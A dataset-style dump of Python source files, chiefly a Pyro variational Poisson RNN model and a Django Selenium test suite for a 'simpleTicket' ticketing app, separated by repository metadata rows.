h = self.dropout(h)
h = self.relu(self.lin_hidden_to_hidden(h))
h = self.dropout(h)
loc = self.lin_hidden_to_loc(h)
scale = self.softplus(self.lin_hidden_to_scale(h))
return loc, scale
class Encoder(nn.Module):
def __init__(self, input_dim, hidden_dim, output_dim):
super(Encoder, self).__init__()
# initialize linear transformations
self.lin_input_to_hidden = nn.Linear(input_dim, hidden_dim)
self.lin_hidden_to_hidden = nn.Linear(hidden_dim, hidden_dim)
self.lin_hidden_to_loc = nn.Linear(hidden_dim, output_dim)
self.lin_hidden_to_scale = nn.Linear(hidden_dim, output_dim)
# initialize non-linearities
self.relu = nn.ReLU()
self.softplus = nn.Softplus()
def forward(self, x):
h = self.relu(self.lin_input_to_hidden(x))
h = self.relu(self.lin_hidden_to_hidden(h))
loc = self.lin_hidden_to_loc(h)
scale = self.softplus(self.lin_hidden_to_scale(h))
return loc, scale
class VPRNN(nn.Module):
def __init__(self, input_dim=32, output_dim=1, p_model_dim=128, p_model_layers=1,
q_model_dim=128, q_model_layers=1, use_cuda=False, verbose=False):
super(VPRNN, self).__init__()
# initialize modules
self.emitter = Emitter(p_model_dim, 32, output_dim)
self.encoder = Encoder(q_model_dim, 32, output_dim)
self.p_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=p_model_dim,
num_layers=p_model_layers, batch_first=True, bidirectional=False)
self.q_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=q_model_dim,
num_layers=q_model_layers, batch_first=True, bidirectional=False)
# initialize learnable initial hidden states
self.h_0 = nn.Parameter(torch.zeros(p_model_dim))
self.q_h_0 = nn.Parameter(torch.zeros(q_model_dim))
self.use_cuda = use_cuda
self.input_dim = input_dim
self.output_dim = output_dim
self.p_model_dim = p_model_dim
self.q_model_dim = q_model_dim
self.verbose = verbose
if self.use_cuda:
self.cuda()
def model(self, X=None, y=None, forecast=False):
# get input shapes
X = X[1:]
T_max, D = X.shape[0], X.shape[1]
# register parameters
pyro.module("model", self)
b = 1
# initialize p_model hidden state
h_prev = self.h_0.expand(b, self.h_0.size(0)).view(1, b, -1).contiguous()
# initialize tensors to store results
lambdas = torch.zeros((b, T_max, self.output_dim))
x_samples = torch.zeros((b, T_max, self.output_dim))
# extract feature embedding
X_embedded = X
# propagate p_model over time
p_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
y[:-1].view(b, T_max, self.output_dim)), dim=2)
hidden_1_T, _ = self.p_model(p_model_input, h_prev)
hidden_1_T = hidden_1_T.view(T_max, self.p_model_dim)
# get mean and st.dev of (log) rate
log_lambda_loc, log_lambda_scale = self.emitter(hidden_1_T)
assert log_lambda_loc.shape == (T_max, self.output_dim)
with pyro.plate("data", T_max):
# sample lambda ~ N(lambda|mu(x), sigma(x))
log_lambda = pyro.sample("log_lambda", dist.Normal(log_lambda_loc, log_lambda_scale).to_event(1))
lambdas[0] = torch.exp(log_lambda)
# sample observations y ~ Poisson(exp(log_lambda))
if forecast:
obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda)).to_event(1), obs=None)
else:
obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda)).to_event(1), obs=y[1:, :])
return lambdas, obs
def guide(self, X=None, y=None, forecast=False):
# get input shapes
X = X[1:]
T_max, D = X.shape[0], X.shape[1]
# register parameters
pyro.module("model", self)
b = 1
# initialize p_model hidden state
q_h_prev = self.q_h_0.view(1, b, self.q_h_0.size(-1)).contiguous()
# extract feature embedding
X_embedded = X
# propagate p_model over time
q_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
y[:-1].view(b, T_max, self.output_dim)), dim=2)
q_hidden_1_T, _ = self.q_model(q_model_input, q_h_prev)
q_hidden_1_T = q_hidden_1_T.view(T_max, self.q_model_dim)
# get mean and st.dev of (log) rate
log_lambda_loc, log_lambda_scale = self.encoder(q_hidden_1_T)
assert log_lambda_loc.shape == (T_max, self.output_dim)
with pyro.plate("data", T_max):
# sample lambda ~ N(lambda|mu(x), sigma(x))
q_dist = dist.Normal(log_lambda_loc, log_lambda_scale)
log_lambda = pyro.sample("log_lambda", q_dist.to_event(1))
return log_lambda_loc, log_lambda_scale
def _get_log_likelihood(self, X, y):
trace_elbo = Trace_ELBO_Wrapper(num_particles=1)
for model_trace, _ in trace_elbo._get_traces(self.model, self.guide, [X, y, True], {}):
ll = -model_trace.nodes["obs"]["log_prob_sum"]
return ll
class MOVPRNN(nn.Module):
def __init__(self, input_dim=32, output_dim=3, p_model_dim=128, p_model_layers=1,
q_model_dim=128, q_model_layers=1, use_cuda=False, verbose=False):
super(MOVPRNN, self).__init__()
# initialize modules
self.emitter = Emitter(p_model_dim, 32, output_dim)
self.encoder = Encoder(q_model_dim, 32, output_dim)
self.p_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=p_model_dim,
num_layers=p_model_layers, batch_first=True, bidirectional=False)
self.q_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=q_model_dim,
num_layers=q_model_layers, batch_first=True, bidirectional=False)
# initialize learnable initial hidden states
self.h_0 = nn.Parameter(torch.zeros(p_model_dim))
self.q_h_0 = nn.Parameter(torch.zeros(q_model_dim))
self.use_cuda = use_cuda
self.input_dim = input_dim
self.output_dim = output_dim
self.p_model_dim = p_model_dim
self.q_model_dim = q_model_dim
self.verbose = verbose
if self.use_cuda:
self.cuda()
def model(self, X=None, y=None, forecast=False):
# get input shapes
X = X[1:]
T_max, D = X.shape[0], X.shape[1]
# register parameters
pyro.module("model", self)
b = 1
# initialize p_model hidden state
h_prev = self.h_0.expand(b, self.h_0.size(0)).view(1, b, -1).contiguous()
# initialize tensors to store results
lambdas = torch.zeros((b, T_max, self.output_dim))
x_samples = torch.zeros((b, T_max, self.output_dim))
# extract feature embedding
X_embedded = X
# propagate p_model over time
p_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
y[:-1].view(b, T_max, self.output_dim)), dim=2)
hidden_1_T, _ = self.p_model(p_model_input, h_prev)
hidden_1_T = hidden_1_T.view(T_max, self.p_model_dim)
# get mean and st.dev of (log) rate
log_lambda_loc, log_lambda_scale = self.emitter(hidden_1_T)
assert log_lambda_loc.shape == (T_max, self.output_dim)
with pyro.plate("data", T_max):
# sample lambda ~ N(lambda|mu(x), sigma(x))
log_lambda = pyro.sample("log_lambda", dist.Normal(log_lambda_loc, log_lambda_scale).to_event(1))
lambdas[0] = torch.exp(log_lambda[:, :2])
# sample observations y ~ Poisson(exp(log_lambda))
if forecast:
obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda[:, :2])).to_event(1), obs=None)
else:
obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda[:, :2])).to_event(1), obs=y[1:, :2])
return lambdas, obs
def guide(self, X=None, y=None, forecast=False):
# get input shapes
X = X[1:]
T_max, D = X.shape[0], X.shape[1]
# register parameters
pyro.module("model", self)
b = 1
# initialize p_model hidden state
q_h_prev = self.q_h_0.view(1, b, self.q_h_0.size(-1)).contiguous()
# extract feature embedding
X_embedded = X
# propagate p_model over time
q_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
y[:-1].view(b, T_max, self.output_dim)), dim=2)
q_hidden_1_T, _ = self.q_model(q_model_input, q_h_prev)
q_hidden_1_T = q_hidden_1_T.view(T_max, self.q_model_dim)
# get mean and st.dev of (log) rate
log_lambda_loc, log_lambda_scale = self.encoder(q_hidden_1_T)
assert log_lambda_loc.shape == (T_max, self.output_dim)
with pyro.plate("data", T_max):
# sample lambda ~ N(lambda|mu(x), sigma(x))
q_dist = dist.Normal(log_lambda_loc, log_lambda_scale)
log_lambda = pyro.sample("log_lambda", q_dist.to_event(1))
return log_lambda_loc, log_lambda_scale
def _get_log_likelihood(self, X, y):
trace_elbo = Trace_ELBO_Wrapper(num_particles=1)
for model_trace, _ in trace_elbo._get_traces(self.model, self.guide, [X, y, True], {}):
ll = -model_trace.nodes["obs"]["log_prob_sum"]
return ll | 40.749117 | 118 | 0.610128 | 1,676 | 11,532 | 3.902745 | 0.100835 | 0.055037 | 0.024461 | 0.027519 | 0.912246 | 0.901697 | 0.896805 | 0.896805 | 0.896805 | 0.888243 | 0 | 0.015808 | 0.281391 | 11,532 | 283 | 119 | 40.749117 | 0.773501 | 0.14837 | 0 | 0.853801 | 0 | 0 | 0.012073 | 0 | 0 | 0 | 0 | 0 | 0.023392 | 1 | 0.070175 | false | 0 | 0.046784 | 0 | 0.187135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7846ed3ddeb0aeb27cf7ff19e01d412033a7b037 | 28,987 | py | Python | simpleTicket/siteEngine/tests.py | abogeorge/simpleTicket | ca550f4e9817e13e5723ad2483baddc036e435f5 | [
"MIT"
] | null | null | null | simpleTicket/siteEngine/tests.py | abogeorge/simpleTicket | ca550f4e9817e13e5723ad2483baddc036e435f5 | [
"MIT"
] | null | null | null | simpleTicket/siteEngine/tests.py | abogeorge/simpleTicket | ca550f4e9817e13e5723ad2483baddc036e435f5 | [
"MIT"
] | null | null | null | from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from . import entities_utils
import unittest, time, re
import time
class SiteEngineTests(StaticLiveServerTestCase):
id_ticket = 22
id_order = 19
fixtures = ['user-data.json']
# --- Set Up and Tear Down Methods ---
# Set Up
@classmethod
def setUpClass(cls):
super(SiteEngineTests, cls).setUpClass()
cls.driver = webdriver.Chrome()
print ("Initialized Chrome Driver ... ")
# Tear Down
@classmethod
def tearDownClass(cls):
print (" ... Destroying Resources")
cls.driver.quit()
super(SiteEngineTests, cls).tearDownClass()
# --- Utility methods ---
# Returns True if an element is identified
def __is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
# Returns True if the text is identified
def __is_text_present(self, text):
values = self.driver.find_elements_by_xpath("//*[contains(text(), '" + text + "')]")
if len(values) > 0:
return True
else:
return False
# --- Test Methods ---
# Test successful Login
def test1_login(self):
print ("Testing user login ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
# Asserting False auth error message
self.assertFalse(self.__is_text_present("Invalid Username or Password provided! Please try again!"))
# Asserting True index page element
self.assertTrue(self.__is_element_present("name", "our-services"))
# Test unsuccessful Login
def test2_bad_login(self):
print ("Testing wrong password user login ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('bad_password')
driver.find_element_by_name('Submit').click()
# Asserting True auth error message
self.assertTrue(self.__is_text_present("Invalid Username or Password provided! Please try again!"))
# Asserting False index page text
self.assertFalse(self.__is_text_present("simpleTicket is a new self-service app that uses"))
# Test Index/Logout
def test3_logout(self):
print ("Testing user logout ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('logout').click()
# Asserting True logout page text
self.assertTrue(self.__is_text_present("You Have Successfully Logged out of simpleTicket!"))
# Test Index/MyAccount
def test4_myaccount(self):
print ("Testing user MyAccount ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('myaccount').click()
# Asserting True MyAccount page text information
self.assertTrue(self.__is_text_present("Personal Information"))
self.assertTrue(self.__is_text_present("George"))
self.assertTrue(self.__is_text_present("Rus"))
self.assertTrue(self.__is_text_present("Cornel Popescu"))
# Test Index/Services
def test5_services(self):
print ("Testing user Services ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Create Ticket"))
self.assertTrue(self.__is_text_present("Create a new Ticket"))
self.assertTrue(self.__is_text_present("If you need any assistance while creating an IT Ticket or placing any kind of order please contact our HelpDesk team."))
# Test Index/Contact
def test6_contact(self):
print ("Testing user Contact ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('contact').click()
# Asserting True Contact page text information
self.assertTrue(self.__is_text_present("Contact the HelpDesk Team"))
self.assertTrue(self.__is_text_present("Send an e-mail"))
# Test LogIn user/Index/Services/Create Ticket
def test7_user_create_ticket(self):
print ("Testing user create ticket ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('cristina.g')
password_input = driver.find_element_by_name("password")
password_input.send_keys('gcritest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Create Ticket"))
driver.find_element_by_name('create_ticket').click()
# Asserting True Create Ticket page text information
self.assertTrue(self.__is_text_present("Create a Ticket"))
# Populating form inputs
category_select = Select(driver.find_element_by_id('type'))
category_select.select_by_visible_text('Software Problem')
title_input = driver.find_element_by_name("title")
title_input.send_keys('Office License')
description_input = driver.find_element_by_name("description")
description_input.send_keys('MS 2010 Office license has expired.')
priority_select = Select(driver.find_element_by_id('priority'))
priority_select.select_by_visible_text('Medium Priority')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("Ticket successfully created! You will be contacted as soon as possible."))
# Test LogIn user/Index/Services/Active Tickets
def test8_user_active_tickets(self):
print ("Testing user active tickets ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('cristina.g')
password_input = driver.find_element_by_name("password")
password_input.send_keys('gcritest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Create Ticket"))
driver.find_element_by_name('active_tickets').click()
# Asserting True Open Tickets page text information
self.assertTrue(self.__is_text_present("Active Tickets for Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Sent"))
# Test LogIn user/Index/Services/Create Order
def test9_user_create_order(self):
print ("Testing user create order ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('cristina.g')
password_input = driver.find_element_by_name("password")
password_input.send_keys('gcritest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Create Ticket"))
driver.find_element_by_name('create_order').click()
# Asserting True Create Ticket page text information
self.assertTrue(self.__is_text_present("Place an Order"))
# Populating form inputs
category_select = Select(driver.find_element_by_id('type'))
category_select.select_by_visible_text('Inventory Item')
title_input = driver.find_element_by_name("title")
title_input.send_keys('Desk Lamp')
description_input = driver.find_element_by_name("description")
description_input.send_keys('Improve office lighting')
value_input = driver.find_element_by_name("value")
value_input.send_keys('69')
units_input = driver.find_element_by_name("units")
units_input.send_keys('1')
delivery_office_input = driver.find_element_by_name("delivery_office")
delivery_office_input.send_keys('ERO201')
priority_select = Select(driver.find_element_by_id('priority'))
priority_select.select_by_visible_text('Medium Priority')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("Order successfully created! You will be contacted as soon as possible."))
# Test LogIn user/Index/Services/Active Orders
def test10_user_active_orders(self):
print ("Testing user active orders ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('cristina.g')
password_input = driver.find_element_by_name("password")
password_input.send_keys('gcritest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Create Ticket"))
driver.find_element_by_name('active_orders').click()
# Asserting True Open Orders page text information
self.assertTrue(self.__is_text_present("Active Orders for Cristina George"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
self.assertTrue(self.__is_text_present("69.00"))
self.assertTrue(self.__is_text_present("1"))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Sent"))
# Test LogIn supervisor/Index/Services/Subordinates
def test11_supervisor_subordinates(self):
print ("Testing supervisor subordinates view ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Manage staff members"))
driver.find_element_by_name('subalterns').click()
# Asserting True subordinates page text information
self.assertTrue(self.__is_text_present("Active subalterns for George Rus"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("cristina.george@ticket.com"))
self.assertTrue(self.__is_text_present("770"))
self.assertTrue(self.__is_text_present("PDOM-DS"))
# Test LogIn supervisor/Index/Services/Subordinates
# Test LogIn supervisor/Index/Services/ApproveTickets
def test12_supervisor_approve_tickets(self):
print ("Testing supervisor approve tickets ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Manage staff members"))
driver.find_element_by_name('approve_tickets').click()
# Asserting True open tickets page text information
self.assertTrue(self.__is_text_present("Tickets pending the approval of George Rus"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Sent"))
# Opening active ticket
driver.find_element_by_name(str(self.id_ticket)).click()
self.assertTrue(self.__is_text_present("Ticket Information"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
# Approving Ticket
status_select = Select(driver.find_element_by_id('status'))
status_select.select_by_visible_text('Approved')
title_comments = driver.find_element_by_name("comments")
title_comments.send_keys('Ok')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("You have successfully updated the ticket status!"))
# Asseting that the previous approve ticket is now removed from list
driver.get("http://127.0.0.1:8000/home/subalterns_tickets/")
self.assertFalse(self.__is_text_present("Office License"))
self.assertFalse(self.__is_text_present("MS 2010 Office license has expired."))
# Test LonIn supervisor/Index/Services/ApproveTickets
# Test LogIn supervisor/Index/Services/ApproveOrders
def test13_supervisor_approve_orders(self):
print ("Testing supervisor approve orders ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('george.r')
password_input = driver.find_element_by_name("password")
password_input.send_keys('rgeotest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("Manage staff members"))
driver.find_element_by_name('approve_orders').click()
# Asserting True subordinates orders page text information
self.assertTrue(self.__is_text_present("Orders pending the approval of George Rus"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Sent"))
# Opening active order
driver.find_element_by_name(str(self.id_order)).click()
self.assertTrue(self.__is_text_present("Order Information"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
# Approving Order
status_select = Select(driver.find_element_by_id('status'))
status_select.select_by_visible_text('Approved')
title_comments = driver.find_element_by_name("comments")
title_comments.send_keys('Ok')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("You have successfully updated the order status!"))
# Asseting that the previous approve ticket is now removed from list
driver.get("http://127.0.0.1:8000/home/subalterns_orders/")
self.assertFalse(self.__is_text_present("Desk Lamp"))
# Test LogIn HelpDesk/Index/Services/Employees
def test14_helpdesk_employees(self):
print ("Testing supervisor subordinates view ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('gigi.h')
password_input = driver.find_element_by_name("password")
password_input.send_keys('hgigtest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("View contact info for all employees"))
driver.find_element_by_name('employees_list').click()
# Asserting True employee page text information
self.assertTrue(self.__is_text_present("Company Employees"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("cristina.george@ticket.com"))
self.assertTrue(self.__is_text_present("770"))
self.assertTrue(self.__is_text_present("George Rus"))
self.assertTrue(self.__is_text_present("george.rus@ticket.com"))
self.assertTrue(self.__is_text_present("021"))
# Test LogIn HelpDesk/Index/Services/Active Tickets
def test15_helpdesk_solve_ticket(self):
print ("Testing supervisor solve ticket ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('gigi.h')
password_input = driver.find_element_by_name("password")
password_input.send_keys('hgigtest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("View contact info for all employees"))
driver.find_element_by_name('solve_tickets').click()
# Asserting True active tickets page text information
self.assertTrue(self.__is_text_present("All Active Tickets"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
self.assertTrue(self.__is_text_present("Ok"))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Approved"))
# Opening active ticket
driver.find_element_by_name(str(self.id_ticket)).click()
self.assertTrue(self.__is_text_present("Ticket Information"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
self.assertTrue(self.__is_text_present("Processing"))
# Approving Ticket
status_select = Select(driver.find_element_by_id('status'))
status_select.select_by_visible_text('Closed')
title_comments = driver.find_element_by_name("comments")
title_comments.send_keys('Solved')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("You have successfully updated the ticket status!"))
# Asseting that the previous approve ticket is now removed from list
driver.get("http://127.0.0.1:8000/helpd/active_tickets/")
self.assertFalse(self.__is_text_present("Office License"))
self.assertFalse(self.__is_text_present("MS 2010 Office license has expired."))
# Test LogIn HelpDesk/Index/Services/Closed Tickets
def test16_helpdesk_solved_tickets(self):
print ("Testing supervisor solved tickets ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('gigi.h')
password_input = driver.find_element_by_name("password")
password_input.send_keys('hgigtest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("View contact info for all employees"))
driver.find_element_by_name('closed_tickets').click()
# Asserting True closed tickets page text information
self.assertTrue(self.__is_text_present("All Closed Tickets"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Office License"))
self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
self.assertTrue(self.__is_text_present("Solved"))
self.assertTrue(self.__is_text_present("Medium"))
# Test LogIn HelpDesk/Index/Services/Active Orders
def test17_helpdesk_solve_order(self):
print ("Testing supervisor solve order ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('gigi.h')
password_input = driver.find_element_by_name("password")
password_input.send_keys('hgigtest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("View contact info for all employees"))
driver.find_element_by_name('solve_orders').click()
# Asserting True active orders page text information
self.assertTrue(self.__is_text_present("All Active Orders"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
self.assertTrue(self.__is_text_present("Ok"))
self.assertTrue(self.__is_text_present("Medium"))
self.assertTrue(self.__is_text_present("Approved"))
# Opening active ticket
driver.find_element_by_name(str(self.id_order)).click()
self.assertTrue(self.__is_text_present("Order Information"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
self.assertTrue(self.__is_text_present("Processing"))
# Approving Ticket
status_select = Select(driver.find_element_by_id('status'))
status_select.select_by_visible_text('Closed')
title_comments = driver.find_element_by_name("comments")
title_comments.send_keys('Solved')
driver.find_element_by_name('submit').click()
# Asserting True confirmation message
self.assertTrue(self.__is_text_present("You have successfully updated the order status!"))
# Asseting that the previous approve ticket is now removed from list
driver.get("http://127.0.0.1:8000/helpd/active_orders/")
self.assertFalse(self.__is_text_present("Desk Lamp"))
self.assertFalse(self.__is_text_present("Improve office lighting"))
# Test LogIn HelpDesk/Index/Services/Closed Orders
def test18_helpdesk_solved_orders(self):
print ("Testing supervisor solved orders ... ")
driver = self.driver
driver.get("http://127.0.0.1:8000/home/login/")
username_input = driver.find_element_by_name("username")
username_input.send_keys('gigi.h')
password_input = driver.find_element_by_name("password")
password_input.send_keys('hgigtest123')
driver.find_element_by_name('Submit').click()
# Asserting True index page text
self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
driver.find_element_by_name('services').click()
# Asserting True Services page text information
self.assertTrue(self.__is_text_present("View contact info for all employees"))
driver.find_element_by_name('closed_orders').click()
# Asserting True closed orders page text information
self.assertTrue(self.__is_text_present("All Closed Orders"))
self.assertTrue(self.__is_text_present("Cristina George"))
self.assertTrue(self.__is_text_present("Desk Lamp"))
self.assertTrue(self.__is_text_present("Improve office lighting"))
self.assertTrue(self.__is_text_present("Solved"))
self.assertTrue(self.__is_text_present("Medium"))
users = entities_utils.get_employees() | 54.080224 | 168 | 0.704247 | 3,651 | 28,987 | 5.281567 | 0.071487 | 0.041695 | 0.090339 | 0.117254 | 0.858476 | 0.831406 | 0.805995 | 0.794378 | 0.787326 | 0.769434 | 0 | 0.01496 | 0.190603 | 28,987 | 536 | 169 | 54.080224 | 0.806922 | 0.126195 | 0 | 0.682809 | 0 | 0.002421 | 0.238854 | 0.002893 | 0 | 0 | 0 | 0 | 0.324455 | 1 | 0.053269 | false | 0.094431 | 0.024213 | 0 | 0.096852 | 0.048426 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
78b19ea6e44913c05625e39ba5b69428ccd65354 | 5,404 | py | Python | tests/test_mixedmodel.py | jameshicks/pydigree | b268402b14b053d899443ff5ef86aea319d2614b | [
